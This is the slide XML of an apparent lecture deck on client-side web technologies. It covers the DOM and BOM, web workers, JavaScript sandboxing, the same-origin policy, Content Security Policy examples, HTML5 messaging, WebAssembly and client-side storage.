              <a:t> x = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>document.createElement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>('HR');</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>document.getElementById</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>inserthrhere</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>').</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>appendChild</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>(x);</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The Browser Object Model (BOM) is a programmatic interface to the browser properties:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>location.href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> = '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>newpage.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>’;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>history.back</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37457365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6F05-7FD9-CEDF-F2A6-642BB8A31F39}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Main Thread and Web Workers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5EB4F64D-F628-3435-3115-7990792E08C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The execution of complex JavaScript applications might require multiple threads</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The main thread has access to the DOM and BOM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Web workers are JavaScript threads that have no access to DOM and BOM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Usually instantiated for computationally-heavy, long-running tasks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The main thread can communicate with web workers through a messaging API (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>postMessage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>())</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23070325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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>JavaScript Sandboxing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="869379" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>JavaScript code is downloaded as part of an HTML page and executed on-the-fly </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The security of JavaScript code execution is guaranteed by a sandboxing mechanism</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>No access to files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>No access to network resources</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>No window smaller than 100x100 pixels</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>No access to the browser’s history</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The details of how sandboxing is implemented depend on the particular browser considered</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35811997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Same-Origin Policy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Every frame in a browser’s window is associated with a domain</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A domain is determined by the protocol, server, and port from which the frame content was downloaded</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Code downloaded in a frame can only access the resources associated with the source domain of the frame</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If a frame explicitly include external code, this code will execute within the frame domain even though it comes from another host</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>&lt;script type="text/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>"&gt; //Downloaded from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>foo.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>="http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>www.bar.com/scripts/script.js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>"&gt; //Executes as if it were from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>foo.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>&lt;/script&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29588631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Security Policy (CSP)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CSP allows a server to provide directives about what is allowed or not allowed during the rendering of the site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A policy is returned by specifying a Content-Security-Policy HTTP header</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A CSP can be used to whitelist the sources from which JavaScript code can be included, to prevent the execution of inline JavaScript, and to disable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If a browser does not support CSP, it will revert to the same-origin policy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20307049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CSP Examples</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Content-Security-Policy: default-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 'self'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Forces all content to be retrieved from the original site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Content-Security-Policy: default-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 'self' *.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>trusted.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Adds domain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>trusted.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to the domains that can be used to retrieve content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Content-Security-Policy: default-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 'self’; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>img-src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> *; script-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>scripts.js.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Allows images to be downloaded from anywhere, but scripts can be downloaded only from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>scripts.js.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14798369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A3A6-3CD9-9325-0272-D6D57C3D96D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTML 5 Web Messaging</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{134C3F05-007B-EDE7-EB9E-12191500467A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTML 5 introduces well-defined mechanisms to exchange messages between different browsing contexts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>By creating “channels” two different contexts can use the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>postMessage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>() mechanisms to exchange information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Channels are defined by “ports,” which can be passed between contexts to be able to communicate back and forth </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Typically, this is used by a page that embeds another page in an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and integrates its functionality</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37745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Review</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How are resources referenced?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How are resources transferred?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How are resources represented?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How are resources processed on the server side?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How are resources processed on the client side?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36730967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C283-01DA-A22C-270D-FC12AD19F44D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>WebAssembly</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9D9E9E7-3B68-921B-4CD6-5BBCBAA5FD2A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Binary instruction format for efficient execution by a virtual machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>webassembly.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>WebAssembly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> code is compiled and then fetched and instantiated from JavaScript (possibly passing JavaScript objects)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>WebAssembly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> code has the same limitations of JavaScript code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41774489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3167E-775B-49B0-A025-E69B61C5E949}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Client-Side Storage</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB569307-AC7E-A2C2-92E1-D9A6208DB7FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Websites need to maintain state across user interactions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Session data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Preferences</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Current selections/choices</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Web Storage</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Indexed DB</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cache</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Origin Private File System (OPFS)</a:t>
            </a:r>
          </a:p>
